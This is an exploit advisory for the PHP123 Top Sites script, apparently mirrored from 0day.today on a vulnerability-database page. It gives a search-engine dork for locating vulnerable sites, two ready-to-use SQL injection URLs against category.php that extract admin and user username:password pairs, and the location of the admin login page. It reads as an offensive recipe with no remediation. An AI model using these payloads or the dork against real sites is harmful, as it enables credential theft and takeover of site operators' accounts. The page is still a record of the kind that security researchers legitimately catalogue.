Lucene search
PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln
PHP123 Top Sites Remote SQL Injection Vuln pull out admin/users login credential
Show more
=============================================================
PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln
=============================================================
--==+================================================================================+==--
--==+ PHP123 Top Sites SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"
DESCRIPTION:
pull out admin/users login credentials
EXPLOITS:
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*
NOTE/TIP:
admin login is at /siteadmin/
altavista also returns a few diffrent results, dnt use the allintext: thou.
# 0day.today [2018-01-06] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo28 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1